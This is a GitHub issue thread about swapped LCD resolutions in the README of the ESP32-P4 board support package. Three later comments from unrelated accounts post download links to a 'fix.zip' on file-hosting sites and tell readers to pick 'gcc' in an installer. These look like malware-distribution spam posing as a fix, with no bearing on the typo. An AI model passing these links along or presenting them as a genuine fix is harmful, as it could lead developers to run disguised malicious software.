espressif/esp-bsp #379: README typo

chegewara, 2024-08-24:
### Related area

-

### Hardware specification

-

### Is your feature request related to a problem?

-

### Describe the solution you'd like

-

### Describe alternatives you've considered

-

### Additional context

Nothing important, just a typo in P4 BSP description.
Resolution for displays are swapped:
https://github.com/espressif/esp-bsp/tree/master/bsp/esp32_p4_function_ev_board#configuration

```
Selection LCD display Board Support Package(ESP32-P4) --> Display --> Select LCD type

LCD 7-inch 1024x600 - ili9881c (default)
LCD 1280x800 - ek79007
```

### I have checked existing list of Feature requests and the Contribution Guide

- [X] I confirm I have checked existing list of Feature requests and Contribution Guide.

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

closed 2024-08-27 by tore-espressif